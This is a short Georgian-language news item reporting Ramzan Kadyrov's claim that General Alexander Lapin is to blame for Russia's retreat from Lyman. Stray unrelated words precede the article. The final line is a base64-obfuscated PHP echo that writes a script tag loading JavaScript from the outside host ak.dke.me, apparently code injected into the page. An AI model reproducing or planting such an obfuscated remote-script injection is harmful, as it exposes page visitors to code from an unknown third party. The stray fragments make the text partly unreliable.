celsiusi
ავერსი შნაიდერი
ლიმანიდან რუსული ჯარების უკან დახევაზე პასუხისმგებელი ცენტრალური სამხედრო ოლქის მეთაური, გენერალ-პოლკოვნიკი ალექსანდრე ლაპინია, რომელმაც რუსეთის გმირის ვარსკვლავი მიიღო – ამის შესახებ ჩეჩნეთის ლიდერმა, რამზან კადიროივმა განაცხადა. 
 
"ამ მონაკვეთის დაცვას ხელმძღვანელობდა ცენტრალური სამხედრო ოლქის მეთაური, გენერალ-პოლკოვნიკი ალექსანდრე ლაპინი... ლუგანსკიდან მობილიზებული მებრძოლები, ლიმანის მიმართულებით ყველა საზღვარზე გაგზავნა, მაგრამ არ მიაწოდა მათ საჭირო კომუნიკაციები და საბრძოლო მასალა" - ამბობს კადიროვი.
 
კადიროვის მტკიცებით, ლაპინი  ფრონტის ამ სექტორში შესაძლო წარუმატებლობის შესახებ გააფრთხილეს და ამის შესახებ მან,  რუსეთის გენერალური შტაბის უფროსთან, ვალერი გერასიმოვთან პირადად ისაუბრა, თუმცა  გენერალმა მას უთხრა, რომ ლაპინის ენდობოდა - "ელემენტარული სამხედრო ლოჯისტიკის უქონლობის გამო, დღეს ჩვენ დავტოვეთ რამდენიმე დასახლებული პუნქტი და ტერიტორიის დიდი ტერიტორია" - წერს ტელეგრამზე კადიროვი.
 
შეგახსენებთ, ქალაქ ლიმანის დატოვება ოფიციალურად დაადასტურა რუსეთის თავდაცვის სამინისტრომ.
609
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");